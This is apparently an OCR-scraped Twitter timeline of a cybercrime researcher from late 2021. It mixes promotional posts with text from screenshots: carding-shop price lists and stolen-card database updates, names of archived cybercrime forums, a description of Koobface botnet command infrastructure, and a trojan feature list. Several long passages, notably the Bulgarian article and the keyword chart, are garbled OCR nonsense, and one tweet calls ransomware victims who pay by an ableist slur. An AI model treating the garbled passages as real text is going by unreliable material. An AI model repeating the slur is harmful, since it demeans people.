https://t.co/821U8c53KI #security #cybercrime #malware 
#CybersecurityAwarenessMonth #Threatintel #threatintelligence #threatreport 
https://t.co/qEqEpizS5p 
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01:52 


https://t.co/d6Uso70AUT #security #cybercrime #malware 
#CybersecurityAwarenessMonth #Threatintel #threatintelligence #threatreport 
https://t.co/ILnZctvkhb 
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06:55 


https://t.co/wsUKpQAAw1 #security #cybercrime #malware #CyberAttack 
#CyberSecurity #CybersecurityAwarenessMonth #Threatintel 
https://t.co/mVDLOZOnJN 
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https://t.co/qywxc8dgJK #security #cybercrime #malware #CyberSecurity 
#CyberAttack #CybersecurityAwarenessMonth #Threatintel https://t.co/ZYI1rjSzym 
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06:58 


https://t.co/Ep8dlEamXZ #security #cybercrime #malware #CyberSecurity 
#CyberAttack #CybersecurityAwarenessMonth #Threatintel https://t.co/322kuZJlqO 


RIAL 
<p 


PLEASE SIGN IN 


30 - Saturday 


08:06 


Folks. Check this out - https://t.co/ByuFMPAifH this is the official Clearnet URL for my 

official Dark Web Onion - https://t.co/cQq40tVcwD #security #cybercrime #malware 

#CyberSecurity #CybersecurityAwarenessMonth #ThreatHunting #threatintelligence 
https://t.co/AToWBF5aw8 
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US Intelligence Community 2.0 


09:21 


https://t.co/rLaighdAho #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #ThreatHunting #threatintelligence #threatintel 
https://t.co/gWXj8ZcUVG 
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31 - Sunday 


00:33 


https://t.co/UvVAt5gK9BA #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #ThreatHunting #threatintel https://t.co/s1tStaHOT2 
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Search 
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Notifications 


Wall 


Members 


November 


2 - Tuesday 


02:09 


Hi everyone. This is Dancho (https://t.co/JTcqOaYgET) and | wanted to take the time 
and effort to elaborate more on my latest cybercrime research. Remember Darkode? 
Check this out! - https://t.co/rLaighdAho #security #cybercrime #malware 
#Threatintelligence https://t.co/qkauLpgqirD 
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3 - Wednesday 


01:18 


Subscribe here! - https://t.co/gej8f4CWpN #security #cybercrime #malware 
#CyberAttack #CybersecurityAwarenessMonth #threatintelligence 
https://t.co/KSodsSdZyp 
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PRESENTS 


DANCHO DANCHEV 
SPEAKS! 


The World's Most Popular and Often Cited Security Blog! 


16:37 


https://t.co/5ARwhCtdCN #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #Threatintel #ThreatHunting 


8 - Monday 


04:28 


My latest project - https://t.co/WIBGTU5ryT BitCoin accepted for 365 days 
membership where | can guarantee approximately 12 to 20 unique 
cybercrime/OSINT/Threat Intelligence type of actionable intelligence articles ona 
daily basis! Support me today! https://t.co/nqLONe5FgN 
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on My Oveappes ance and K.drupprng 
Arnerren Ceca 2010 - An Anaiyes 

@ wtroducng ‘Dercho Oarcher Spests” 
Otthcxal YouTube Daily Viog = Epmode 01 

@ The Basics of ODINT im the Content of 
Fighting Cybercrime - An in Gept® Gude and 
Aralyes 

@ The Bass of Threat ntedigence Gathering - 
Ba er depth Lewbyws wd ote 


@ Cxpomng the Darhode Forwn Bust and the 


06:12 


https://t.co/gej8f4CWpN #security #cybercime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #CybersecurityNews #Threatintel 
#threatintelligence https://t.co/EBMF4am0LH 
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DANCHO DANCHEV 
SPEAKS! 


The World's Most Popular and Often Cited Security Blog 


20:31 


My new RSS feed - https://t.co/Vf—l8P30qdo Support me today! #security #cybercrime 
#malware #CyberSecurity #CyberAttack #CybersecurityAwarenessMonth 
#Threatintel #threathunting #threatintelligence https://t.co/GIWWLGOoG6HI 
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9 - Tuesday 


07:50 


RT @dsph_ official: Hola #damnconians , We introduce you to the speakers of 
DamnCon 2021 with their topics. Our speaker Mr. Dancho Danchev (... 


07:56 


Stay tuned for my participation! Register here - https://t.co/LxYXgxLOZo Cheers! 
Dancho #security #cybercrime #malware #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/V62IDWG6py 
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Pentosting Hut) 
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Dancho Danchev 


Establishing Methadology for 
Threat Intelligence 
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N 


12:55 


Check this out! #security #cybercrime #malware #CyberAttack #CyberSecurity 
#ThreatHunting #Threatintel #Threatintelligence https://t.co/oUfHGmakKQs 


<1, 
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Disruptive 
Or 


[3 Offensive Warfare 


10 - Wednesday 


04:29 


Check this out! - https://t.co/GRMcplpzAE #security #cybercrime #malware 
#CyberAttack #CyberSecurity #ThreatHunting #Threatintelligence #threatintel 
https://t.co/TVGWjpmiTO 
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11 - Thursday 


23:07 


Folks. Do you want a decent and convenient way to improve your situational 
awareness in cybercrime research? Grab a copy of my Cybercrime Forum Data Set 
for 2021 which is 36GB - https://t.co/mZ4FeTnSMp #security #cybercrime #malware 
#ThreatHunting https://t.co/aYqoYl4WkG 


Distribution of keywords (Frequency) 


23:08 


My Cybercrime Forum Data set for 2021 consist of full offline copies of 126 publicly 
accessible cybercrime-friendly forum communities for Technical Collection 
analysis/cybercrime research/OSINT enrichment and threat intelligence analysis. 
Grab a copy today! 


*1 


13 - Saturday 


03:32 


https://t.co/emFBYU8Pld #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cybersecuritytips #ThreatIntel #ThreatHunting #threatdetection 
#threatintelligence #threatreport https://t.co/e9JdD8z68U 


Distribution of keywords (Frequency) 


PROXY 2,1% CISCO 2,1% 

DUMPS 2.19 

MATASUHE 2.0 

DDOS 1,94 

PRICE 1,7% 
YOUTUBE 1,7% 
CKPMITTHHE 1,7% 


FIPODAKA 2.3% 
CTUMNEP 2.2% 
ONYDMNKA 2.3% 


ORIGIN 2.3% 
AMEX 2.4% 


CNOMNEP 2.6% 


BITCOIN 1,7% 
PAYMENT 1.7% Jim ONYDEPb! 2.7% 
WEBMONEY 1,7% 
AKKAYHTA 1,7% CMAMEPb! 2,7% 
eat 1,6% AHDPOMD 0,7% 
mora aid NESTERT 0.7% 
CMAM 1.6% ea coe 
AMAZON 16% ~ ROPYESTS 0, 
TOBAPOB 1.6% MERAESERISID,9% 
CEPBEPA 1.5% ’ DERIROET EER AGEs 0.9% 
YUSBMMOCTb 1.5% NPBUIPYS! 0.9% 
adeelgpey seneSSAEA 9.7% 
AL CLOUDRABA ATA, 1.1% 
MAPONV 1.4% PACCBINKA OBPBHICOB 1.1% 
: MOKYMEHTbI 1.2% 


17 - Wednesday 


23:50 


New layout - https://t.co/OmUajr8DT8 inquire at disruptive.individuals@gmail.com 
#security #cybercrime #malware #CyberAttack #CyberSec #Threatintel 
#Threatintelligence #ThreatHunting https://t.co/qwb2I2Gleh 
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ee: Disruptive Individuals — Boutique 
Meiers Cyber Intelligence Services 


“We make Cyber Intelligence 
impact where no one has been 
before!” 


19 - Friday 


06:33 


https://t.co/WIBGTU5ryT #security #cybercrime #malware #CyberAttack 
#CybersecurityAwarenessMonth #cybersecuritytips #threatintelligence 
https://t.co/y4KMwXm6mw 
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06:34 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #CyberAttack 
#CybersecurityAwarenessMonth #cybersecuritytips #threatintelligence 
https://t.co/ABNpMNqij4 


ee: Disruptive Individuals — Boutique 
Meiers Cyber Intelligence Services 


“We make Cyber Intelligence 
impact where no one has been 
before!” 


10:19 


Anyone interesting in hiring me to do contractor work? - https://t.co/OmUajr8DT8 
#security #cybercrime #malware #CyberAttack #ThreatHunting #ThreatIntel 
#threatintelligence https://t.co/l4I3fWnVG5 
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- Neways Disruptive individuals — Boutique 
Miers Cyber intelligence Services 


“We make Cyber Intelligence 


impact where no one has been 
before!" 


20 - Saturday 


00:30 


https://t.co/WIBGTU5ryT https://t.co/vRs4ShzoGI 


= verified.bz 


S Webmasters.ru.rar 

= Whitehat.vn.rar 

= WWH-Club.rar 

= www.forohack.com.rar 
eS WWW.Opensc.ws.rar 
= www.ryan1918.com.rar 
=e Xakep.bg.rar 

= xaker.name.rar 

= xaknet.org.rar 


= Zismo.rar 
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00:31 
https://t.co/WIBGTU5ryT https://t.co/nMSZy3unVv 
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= ica.su.rar 

=e iFud.rar 

eS iHonker.rar 
=e imhatimi.org.rar 
S iransec.net.rar 
N=} it-24h.com.rar 
BS itsobr.com.rar 
eS LinkFeed.rar 
eS Linuxac.org.rar 
N= Master-X.rar 
= MaulTalk.rar 


00:31 
https://t.co/WIBGTU5ryT https://t.co/53k8BZ4KHI 
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= BPCForum.rar 
= carderplanet.rar 
S carders.se.rar 

eS cardingmafia.ws.rar 
BS cardingsite.cc.rar 
N=} Cardvilla.rar 

S c-cracking.org.rar 
S Chf.rar 

eS CNHonker.rar 
eS CNSec.rar 

A=] Cracked.to.rar 


22 - Monday 
00:49 
Happy birthday to me! Regards. Dancho https://t.co/jOnDwW5j2q 
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01:39 


24 - Wednesday 


08:08 


@securityaffairs Thank you! Regards. Dancho 


https://t.co/dyYJacYtj5 https://t.co/cdcWEPecnm 


BF Os 
Nlonog 3a mactoamara xocnmTaansanua: [locrerna 2a phe rer ) 
NCHXMATpPINeH CTalHOHap HM AO MACTORUDIA MOMCHT He ¢ nNoaAgIRA 
(CRCLIBAHSHPaHA NcHxHaTpHdna Goo. JloreggH.c Upeguema ug, PY wm 
MBP. Tposs. iy A Poe note, “PATNA 
orn tlen gunn OT pozurresimre ~H HokeLenneTO zaTIpa o 
POTATO A= MECC JOAN, KOLATO, SaMHNDA Wa KHNCe CAM Ha KBAapTHpa | 
Resbusscdipes repens Mece nop KAA CKELHERHA BpPRaKA Cc TAX Mr 
uO; CACH TORA CNpAa 2ace ofaxKna. Ha nosppneBannia oT TAXHi 
ICTPAMA IC OFNOBAPAA HAH H3KAIOUBAA TeAedbonnTe cu. Tona rt NMPHTCCHIAO 1 
Te SANOWNAA Ja TO H3AHpHaT axTHBHO. TloayawtaH MHCMO OT Xa3aHHa, 4e 2 
15.09.10r. tpa6na ma ocnoGon#tT KBapTupaTa, @ TAKA CbUIO HM HAKOAK: 
QGaARARNIA 98. HETLAATEHH ANIHMFOBH BHOCKH 3a 3aKyNeH OT CHMA MM Aaron 
Ha nocotenara aaTa Te oriiian » Cocbusat, KAeTO HaMepHaH CHa cH Ma cm 
& kuaprnpata. Orkasnas ta ropopH ¢ Tax, 6a rpy6 wu xaanen. CeOpaan wt 
Saremxa 30528 ce BLpHat » Tpoan, Tot mt ocranna npea Kuaprupata no; 
. MPSAACr, 4e ¢ SacT Ht JAMHHAaA HAKDRE c TaxcH, Cacy 3aBpbutaHeTo B Tpoxt 
OTKAIBAA JA KOHTAKTYBA C posUITeaNTe HC ApyrH nosHaTH. SaTBapAA ce 1 
<GHA B CTAATA Cit, OTKAIBAA AA Ce Xpaitit SeewHO c TAX. Hamyckaa foma cu 6c 
‘Fa Rana OGACHCHHA KERe XOmM HM Kora me ce BbpHe. Mpomanata 1 
SRMMCACUHCTO naty OMAR KONCTATHpPaHA HM OT cDces HM oMpHATeAH Hi 
pcemeliporo, ‘Konto. Jlat4o NosMNHABAA KATO Halrbato wenosnarH. Tips 
oTnpanenm sa6cacKKH oT Crpana wa Majikara ,3am0uBar RA Araesta AoUIO” 
Hancamne Xone, Cc mpcHOcHMHA KoMnioTDp. Tacmaa TeacBHaHA OT OKOM 
MCTLP PASICTOAHHE, SAKAIOUNAA H MO HAKOAKO ITSTH MpoOnepABAA BXOWHAT: 
BpaTa Jeaxsoicna. Herocpeactseno mpeg HaMecaTa Ha NOAMLUAT: 
gano4 r UO, CMCCRAA CNOMEHH OT JETCTBOTO C HACKOp 


* eas wd ernie uy yanoTpeGana, MHOTO KOMIMOTDPHH TepMHHM WO Crenen 1: 


28 - Sunday 


09:05 


https://t.co/99acM24Alq #security #cybercrime #malware #CyberSecurity 
#CyberAttack #ThreatHunting #Threatintelligence #threatintel 
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29 - Monday 


10:30 
https://t.co/Bqbi2IDib5 #security #cybercrime #malware #CyberSecurity 
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30 - Tuesday 


06:36 


Who follows me on Twitter? Reply with an introduction. Thanks! #security 
#cybercrime #malware #threatintel 


a2] 


06:50 


@vxunderground Bad stuff. Believe it or not that’s not true. The true bad guys never 
really care or sometimes know what you’re saying or doing unless of course you 
come up with a pretty bad way to undermine their online campaigns. That’s the true 
way of dealing with them. 


07:16 


@bambenek @threatpost That’s not necessarily true. Although the bad guys aim to 
bypass the Google Play anti-malware restriction I’ve seen underground market 
propositions where they trade with and seek to buy legitimate Google Play publisher 
accounts to propagate their campaign. 


12:45 


https://t.co/kyI5GvScSi #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #Threatintel #threatintelligence 
https://t.co/oc3AQHYCBB 


21 %1 


13:17 


Xmas came early. And so is my birthday. Check this out! God bless and enjoy the 
holidays! Cheers! Dancho #security #cybercrime #malware #cybersecurity 
#threatintel #threatintelligence https://t.co/L9c89MwnHr 
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December 


2 - Thursday 


06:57 


Making headlines on a daily basis. Since the early days of humankind. 
https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#CybersecurityNews #ThreatHunting https://t.co/OqLFg7ETV3 
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07:12 
Let’s set them straight. https://t.co/JTcqOaYgET https://t.co/gmUuHQevpu 
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GET 
READ Y 
TO 
EXPOSE 
IRAN 


WHO'S WHO ON WHO'S BUYING 
IRAN'S CYBER THEM BOOKS? 


WARFARE SCENE? An-depth 
5 tically relevant 

analy flran's 

cyber warfare 

doctrine 

HOW DO THEY 

OWN AND 


COMPROMISE? 


WHERE DO THEY 
GO TO SCHOOL? 


In-depth ana 
acé 


ANALYSIS BY DANCHO DANCHEV - REPORT PRICE - $500 


07:14 
Let’s set them straight. https://t.co/JTcqOaYgET https://t.co/REJLL69GXQ 
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“AN IN-DEPTH ANALYSIS OF HUNDREDS OF HIGH-PROFILE AND 

NEVER-PUBLISHED BEFORE SECURITY RESEARCH ARTICLES AND 

OSINT ANALYSIS BY THE WINNER OF JESSY H. NEAL AWARD FOR 

BEST BLOG FOR ZDNET'S ZERO DAY BLOG FOR 2010." - DANCHO 
DANCHEV 


DANCHO DANCHEV'S 
SECURITY RESEARCH 
PORTFOLIO FOR 


ZDNET'S ZERO DAY 
BLOG 


IN-DEPTH OVERVIEW AND ANALYSIS OF 
SECURITY BLOGGER DANCHO 
DANCHEV'S SECURITY RESEARCH FOR 
ZDNET'S ZERO DAY BLOG CIRCA 2008- 
2012 


BY DANCHO DANCHEV 


07:26 
Let’s set them straight. https://t.co/JTcqOaYgET https://t.co/eccj7LsqoW 
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11:05 


Setting them straight. https://t.co/qLxz4GuRip #security #cybercrime #malware 
#ThreatHunting #Threatintel https://t.co/g9dWdlwy6a 
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3 - Friday 


05:35 
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Cyber 
Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchey 
The RON, The Kooblace Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns inchxting Botnet and 
Money Mule Recrusimemt Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 


https //ddanchev. blogspot.com 


Dancho Danchev 


= #€ A@ < 


Chapters Notebook Search Share Settings 


https://t.co/jdLtDXuOdW https://t.co/iSS9NWk28n 


REMOTE ACCESS TROJAN 

Worst E-MAR. PROPAGATION 

Wor: IRC PROPAGATION 
KEYSTROKE LOGGER 

FTP SERVER 

PASSWORD GRABBER 

DESTRUCTIVE 

TARGETS SPECIFIC PROGRAMS 
STARTS EVERYTIME WINDOWS STARTS 


nv009009 


k Orifice 06,31 

1.0 

Throat 2.0 
f 


Ht E'Y_LOCAL_MACHIP WARE \Mictosolt ows \CurrentVersion\RunSen 


The functions of this trojan are 


GilFnend 1 
Database Viewer Copyright © 1999, Diamond Computer Systems Pty. Lid. ~- information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 


08:50 


Folks? Who remembers the early days of @MaltegoHQ | do! Check out this 
screenshot part of a Russia vs Georgia DDoS attack investigation a decade ago - 
https://t.co/oMTRJCRdMJ guess what? "| Know Who DDoS-ed Georgia and 
https://t.co/OPLSbzSK7Q Last Summer". https://t.co/dy2lyRY61T 
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08:52 
https://t.co/JTcqOaYgET https://t.co/qTmpep9d0S 


08:52 


https://t.co/JTcqOaYgET https://t.co/AyKKvTXues 
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08:52 


https://t.co/JTcqOaYgET https://t.co/KGTsniCXkC 
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08:52 
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08:56 


https://t.co/JIcqOaYgET #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatdetection https://t.co/YESXvYJ2iK 


bmber 7, 1982 


09:13 


https://t.co/qs5iTxLwmkK1 #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #Threatintelligence #threatdetection 
https://t.co/H48MgFI3dQ 
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4 - Saturday 


06:06 
https://t.co/JTcqOaYgET https://t.co/9SejCtrawr 
ugmarketcc Shop Orders Cart (0) Gitt code Affiliate | Sexson | i 
Shoping Creditcard 
HOT Cards packagell! 
Package 50 cards UNCHECK Package 100 cards UNCHECK Package 1000 cards UNCHECK 
Combo 80 creditcards Combe 100 creditcards Combo 1000 creditcards 
$9/eard for 50 card(s) $9card for 100 card(s) $9eard for 1000 card(s) 
Normal price: $456 Normal price: $968 Normal price: $9868 
» suYNow « >» suYnNow « >» surnow « 
Package 50 cards live 100% CHECKED Package 100 cards live 100% CHECKED Package 1000 cards live 100% CHECKED 
Combo 50 crecitcards Combe 100 creditcards Combe 1000 crecitcards 
$15kcard for 50 card(s) $15icard for 100 card(s) $15kcard for 1000 cardis) 
Normal price: $750 Normal price: $2560 Normal price: $45066 
NOW: $575 NOW: $1100 NOW: $10500 
06:07 


https://t.co/JIcqOaYgET https://t.co/UU80RyDay4 


06:07 
https://t.co/JTcqOaYgET https://t.co/diJnx4491E 
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06:07 


https://t.co/JTcqOaYgET https://t.co/K4gUI2DeZ5 


DATABASE: NOV#27_(SNIFFED-100) JOHNLEGEND UPDATE 
Added 113x card to Novi##27 (Sniffed-100)JohnLegend 
27/Nov/2021 by MajorShop 


DATABASE: 26#NOVEMBER(SNIFF-TEES/LOW-US)_88X UPDATE 
Added 58x card to 26#November(SNIFF-TEES/LOW-US) 88x 
26/Nov/2021 by MajorShop 


DATABASE: 26#NOVEMBER(SNIFF-TEES/LOW-US)_88X UPDATE 
Added 55x card to 26#November(SNIFF-TEES/LOW-US) 88x 
26/Nov/2021 by MajorShop 


DATABASE: 26#NOVEMBER(SNIFFED-TEES-US)_ 54x UPDATE 
Added 52x card to 26#November(SNIFFED-TEES-US) 54x 
26/Nov/2021 by MajorShop 


DATABASE: 26#NOVEMBER(SNIFFED-TEES-US/AU)_50X UPDATE 
Added 50x card to 26##November(SNIFFED-TEES-US/AU) 50x 
26/Nov/2021 by MajorShop 


7 - Tuesday 


04:46 


https://t.co/WLBKklyuhf #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #ThreatProtection 
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9 - Thursday 


16:25 


https://t.co/SGqQztcxaF #security #cybercrime #malware #CyberSec #CyberAttack 
#ThreatHunting #Threatintel #Threatintelligence #threatreport 


16:25 


https://t.co/yiAanNSVkZ #security #cybercrime #malware #CyberSec #CyberAttack 
#ThreatHunting #Threatintel #Threatintelligence #threatreport 


16:26 


https://t.co/7vCMCCfkpl #security #cybercrime #malware #CyberAttack 
#ThreatHunting #Threatintel #threatreport 
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10 - Friday 


05:01 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #CyberSecurity 
#CyberSec #CyberAttack #cyberattacks #ThreatHunting #Threatintel 
#threatintelligence #threatreport https://t.co/jo3bRidPWR 


- eWay; Disruptive individuals — Boutique 
Miers Cyber intelligence Services 


“We make Cyber Intelligence 


impact where no one has been 
before!" 


09:25 


Show some love for my YouTube channel - https://t.co/OgnnO8saUO and stay tuned! 
Regards. Dancho #security #cybercrime #malware #CyberSecurity #CyberAttack 
#Threatintel 


11 - Saturday 


19:11 


https://t.co/JTcqOaYgET #security #cybercrime #malware #threatreport 
https://t.co/DAR51iXuDN 
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12 - Sunday 


01:23 
https://t.co/JTcqOaYgET https://t.co/I2BevoTW22 
ate 
©) 
@ 
A \e 
Sk @ 
01:23 


https://t.co/JTcqOaYgET https://t.co/2NN9qaRglIr 
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01:23 


https: 
ps://t.co/JTcqOaYgET https://t.co/2GtNxzbaW 
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01:24 


https://t.co/JTIcqOaYgET https://t.co/FPN8MScdil 


es teeree 


; a 
B. new: tare 


ene wee see oy 


01:24 


https://t.co/JTcqOaYgET https://t.co/vP6eOOmoZd 
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01:32 

Psst! Check this out. This is @mikko detailing a botnet C&amp;C using his name 
which surprise surprise was registered using my name. It’s happy to know that you’re 
getting noticed by cybercriminals internationally. Keep it up! https://t.co/wBGrnAkJNY 
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Primary server fel shilitex ke 
Primary ip a@dewes 92, 46.53.180 


Last modified - 2011-03-09 11:55:26.0 
comin state oh - Mermal state, 


Begietar crested. SKILLTEX 


01:34 


It’s official. It’s 2008-2013 and I’m getting referenced by the Koobface Gang in its 
official C&amp;C communication channels. Cheers! https://t.co/XDZ80tWaL2 
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C&C ARCHITECTURE 


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C 
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication 


protocol 
Retrieve commands and o | 
1 KOOBFACE zombie computers’ IP t 
resses from C&C s 
KOOBFACE C&C -~ 1 kooersce coc 
he ” ieee | 
7 / I 
Retrieve commands from C&C @ Foal 
I 
<3 as ‘< Koottece pomtee 
Retneve subsequent r as ci 
commands and -<-= i 
2 components using zombies 
as proxy 
Affected User Mew tee | ner 
Figure 40. KOOBFACE C&C prior to July 19, 2009 Figure 41. Updated KOOBFACE C&C as of July 19, 2009 


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown 
attempts initiated by Intemet service providers (ISP's) and members of the security industry, the KOOBFACE gang 
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented 
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of 
their C&C should another takedown be attempted‘ 


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message 
(see below) for one of the security researchers tracking the malware's domain activities 


01:35 


| might in trouble for posting this but hey it’s the RBN that send it to me for reference 
purposes. Don’t forget. Diamonds degrade their quality. Bulletproof hosting services 
courtesy of the RBN are forever. https://t.co/jjuz2uEmiK 
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Wholesale domain registration and internet services -- OnlineNIC Inc. - Mozilla Firefox 


Gain [pecxs Ga Mypnan Zeeman: fpctpymerme: Croesxs 


bd ec A @ Lael Nttos: //worw.crinensc.com tp _enghgh manage _accountlaccount_kst.php ° iG)- + 
fs) 5 - 
Choose Type @ater Year 2007 =O Before Year 2007 a 
» Value-Added Services 
Choose Time Year ¥ | Month v Day ¥ TO | Month wv Day ¥ 
» TemplatelAP! : : u d 
Note 
* SSL Certificate 
* Mercham Account 
Submit Download 
* Domain Monetizing 
* Domain After Market © Current Domain Status 
* Customization 
No, Transacton Time Sum Mode Note 
Quick Access 1 payment o7/28/2006 0.0 © Shield apply fee movie2b biz 
¥ Customize Quick Access payment 2 x doman regatratec tee = 
¥ Bulk Register } payment OT/27/200 00 © Stet apply fee xxxbeauty net 
¥ List My Domains 4 payment TAT 2K 7.29 net domain registration fee xxxbeauty net 
¥ Get Auth-Code 
syire 1 oman A s * 
¥ Registrar Transfer 
epost 1 e-be os te 
¥ Account Transfer 
¥ ONS-DIY aye: 1 syrert +5 c 
¥ Add Funds & payment 07/17/2007 799 Doran Renewal Fee jabd.org 
¥ © Shiedd =] payment 0313/2007 499 © Stet apply fee rbanetwork com 
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Missing the old school days? This is me getting referenced in the actual URL structure 
of a popular scareware campaign. Glorious times. https://t.co/szzpUstB03 
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It’s getting even better. | actually got a response to my "Top 10 Things You Didn’t 
Know About the Koobface Gang" article which | posted on @ZDNet. The message was 
left within the actual landing page for each and every Koobface Gang campaign. 
https://t.co/dTXW50EjZI 
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Who’s winning the loCs (Indicators of Compromise) race? I’m not quite sure but | 
think | made it into a study on the topic. https://t.co/VToo08pGnU 
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ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 
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with Do's cyber assets 
unacceptable. Initiate an 
immediate traceback! 


deception! While 
they concentrate 
on the mail 
servers, we'll 
transmit back the 
data obtained 
from the infected 


from the Russian 

to faciliate OSINT 
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said Sun Tzu! 
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Our team, so often called “Koobface Gang". expresses high gratitude for the help in bug fixing, researches and documentation for our 
software to: 


Kaspersky Lab for the name of Koobface and 25 millionth malicious program award; 

Dancho Danchev (http://ddanchev. blogspot.com) who worked hard every day especially on our First Software & Architecture version, 
writing lots of e-mails to different hosting companies and structures to take down our Command:and-Control (C&C) servers, and of 
course analyzing software under VM Ware; 

® Trend Micro (http://trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a 
very cool document (with three parts!) describing all our mistakes ve've ever made; 

Cisco for their 3rd place to our software in their annual “working groups awards"; 

*® Soren Siebert with his great article; 

Hundreds of users who send us logs, crash reports, and vish-lists. 


In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security tearm - the guys made us 
move ahead, And we've moved, And will move. Improving their security systern. 


By the way, we did not have « cent using Twitter's traffic. But many security issues tell the world we did. They are wrong. 

As many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit 
cards. Owr software did not ever steal credit card or online bank information, passwords or any other confidential data. And WILL NOT EVER. 
As for the crashes... We are really sorry. We work on it :) 

Wish you a good luck in new year and... Merry Christmas to you! 


Always yours, “Koobface Gang”. 
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5.3. Understanding Intelligence Sources 

The availability of the longitudinal data (the IOCs collected over 
a span of 13 years) also enables us to investigate the qualities of 
the indicators produced by different sources and their timeliness 
against new threats, as reported below. 
Timeliness. Using the aforementioned attack clusters (see Table 7), 
we analyzed the distribution of the articles first reporting the at- 
tacks over different blogs, as shown in Figure 8b. We found that 10 
blogs were responsible for the first report of 60% the clusters (each 
cluster likely to be a campaign). For example, the blog Dancho 
Danchey first report 12 clusters, each time involving 45 IOCs on 
average, Which later also showed up on other blogs. 
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14:29 


https://t.co/JIcqOaYgET #security #cybercrime #Malware #CyberSecurity 
#cyberattacks #Threatintel https://t.co/GsEvTXXKs5 


2 
14:30 
https://t.co/JIcqOaYgET #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintel https://t.co/OqG6UWWLLy 
27 4 
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17 - Friday 


05:48 


BupmyaaHo npocmpaxncmBo 


KABEPTEPOPUASMbI 
TOKOAKO PEAAEH E MPOBAEMbT? 


VH@OPMALIMOHHATA MKOHOMMKA, 8 koamo 
cBemem HaBseze npe3s nocaeguume 20 2oguru, 
GaazonpuamemBa pasBumuemo Ha mMOgepHUMe 
cpegcmBa 3a komyHukauus, pas6uBadku mekgykou- 
museHmaanuMe U eMHUYeckU epanuUU, NpugaBai- 
ku HOBU U3MePEHUA Ha NOKAMUEMO UHmOPMaLL- 
OHHO O6wecmBo, a make 6u MOoUHOMO NOHAMUe 
€ UHDOPMaUUOHHO-saBucumo ObwecmBo! 

Ta3u cmamun ce cmpemu ga paseacega npobsema 
3a UNdOpMauUOHHaMa Botta u kubepmepopu3ma, 
koimo Heu3MeHHO 8 ConemcmBa, om pa3auuHU 
eaegHu mouku. Ta we omzoBopu Ha CcAegHume 
Bonpocu - kakBo e kuGepmepopusem u kakBa 
@ pa3saukama mexkgy He2O0 U UH@OPMauUOHHama 
BodHa? Mozam au geicmBusma Ha ukxdOpMauUU- 
OHHama Boda u e kubepmepopu3em ga npegu> 
Bukam voBewku *xepmBu uAu ukOHOMUYeCcKU xaoc 
u kak6u ca By3moxkHume CUueHapuU? 


BAHMO DAHNEB. 


afumurmo 2 evkmpoumamas 
Presets om@apanemo na 

Cornwume, npouflogemicas = 
hopropumufereme upedu, ¢ wen yEena- 
shane eo epou floqumessocmns “pe3 
Crbekgane ws upedotoSayspunume 
kenywubsuua, Ca onscfwume npUwuIe 
} emomemaxsomo payfumue ma ku 
Gepusuve bamo US u Gogew gaukmop 
} yenee we apes ou Phepopaua- 
womumas boom kano numpopaa pe 
Gorm, pagyyuiiumeue, sponaramgies 
© gope mepopucmueny getcmbus 
oe onze cue om ajgilueme = 
mewéuyesms, Mamepwrm u mpbame 
emmuuas 6 kocuoca, Qakmopeme 


Gpewemo ma Cmygenama GoGna LIPY © 
KDE ca papeumaw ocnotee ma HUMINT 
(wobewko pagyyafanel uspopaaue- 
cmuma pebosbues u mohawpuue 
Qoapunece 2 QoMmaMumeuomo pay 
Gumue wa SIGING (comiue papper 


Meck noms ja Oobepaie S ann se pupae 
na pagypralameana umpopwawes u 
Gogene na Coens getcmbus. Tho 
usm awepuhamhu pagyyafameven 
cameaum ~ CORONA, uyepauias 
cvipanume Cameaumme cwowhu ua 
(Cefemchus ering epey kancya, kourno 
ce lumanypuupaw u Guw npufvues 
6 cheans - rpouer, hotmo guraweme 
pay pellameues enue egfa wu Guu 
wechae G2 cu Cnoseeem Mpu mocmoneno 


nsuasstoaume papogu p opens 


Since when does the "epidemic rise" of cryptoviral extortion also known as today’s 
modern ransomware threat consitute big news? It doesn’t. 


05:48 


Forget me if I’m wrong but dedicated onions and dedicated "negotiation" staff is total 
crap in terms of good old fashioned cybercrime syndicates. It’s just a way to 
monetize access to a malware infected host. 


05:48 
Back in 2006 | released the ubiquitous "Malware - Future Trends" white paper - 
326 


https://t.co/g3X7CIZ2Mk where | discussed the rise of cryptoviral extortion and 
speculated that it’s a fad. Someone must have been reading that white paper back 
then. 


05:48 


Only a true retard will pay a complete stranger millions of dollars to begin with to 
minimize the damage caused by a potential negative PR campaign launched by the 
bad guys who will leak the stolen information anyway. Who cares about this 
information anyway? 


05:48 


Fueling growth into a fraudulent model is as bad as cybercrime 1.0 is in terms having 
cyber insurance companies actually paying you for getting hacked let’s not forget 
